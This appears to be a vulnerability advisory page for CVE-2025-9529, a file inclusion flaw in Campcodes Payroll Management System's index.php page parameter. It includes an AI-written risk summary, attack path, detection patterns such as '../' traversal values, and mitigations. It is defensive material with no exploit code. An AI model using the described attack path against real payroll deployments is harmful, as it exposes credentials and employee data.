CVE Alert: CVE-2025-9529 – Campcodes – Payroll Management System
CVE-2025-9529
A weakness has been identified in Campcodes Payroll Management System 1.0. The affected element is the function include of the file /index.php. This manipulation of the argument page causes file inclusion. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited.
AI Summary Analysis
Risk verdict
High risk: remote, unauthenticated file inclusion with automated PoC availability; exploitation urgency is elevated.
Why this matters
For payroll systems, local file inclusion can expose sensitive files (config, credentials, source) and enable partial impact on confidentiality, integrity, and availability. An attacker could leverage this to glean internal data or pivot within the host environment, with real potential to disrupt payroll processing or surface further weaknesses.
Most likely attack path
Attacker sends crafted requests to index.php (page parameter) to trigger include, without authentication and with no user interaction. The vulnerability is remote and low effort to exploit, and PoCs exist, meaning automated tooling could be used to scan and exploit at scale. Successful attempts depend on server PHP configuration and file-system permissions, potentially enabling local file reads or benign-then-abusive inclusions.
Who is most exposed
Web-facing deployments of Campcodes Payroll Management System 1.0, especially on shared hosting or on-prem servers with publicly reachable index.php and permissive include handling, are most at risk. Organisations with minimal input validation around include targets or outdated PHP configurations are particularly exposed.
Detection ideas
- Web logs show repeated requests to /index.php?page= with traversal-like values (e.g., ../)
- PHP error logs reference include statements or failed file reads tied to index.php
- IDS/WAF alerts for LFI-like patterns or suspicious include targets
- Indicators of automated scanning or PoC payloads in network traffic
- Unusual access patterns to config or credential files
Mitigation and prioritisation
- Apply vendor patch or upgrade to the fixed version; confirm integrity of index.php include handling.
- Disable or strictly validate user-controlled include targets; remove or restrict page parameter usage.
- Enforce PHP settings: disable allow_url_include; restrict file-system permissions; implement a secure include_path.
- Implement input validation and output encoding; add application-layer allowlists for include targets.
- Enhance monitoring and alerting for LFI indicators; perform network segmentation and routine vulnerability scanning.
If KEV or EPSS indicates elevated risk, prioritise remediation as a top fix.
A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.
If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below
To keep up to date follow us on the below channels.
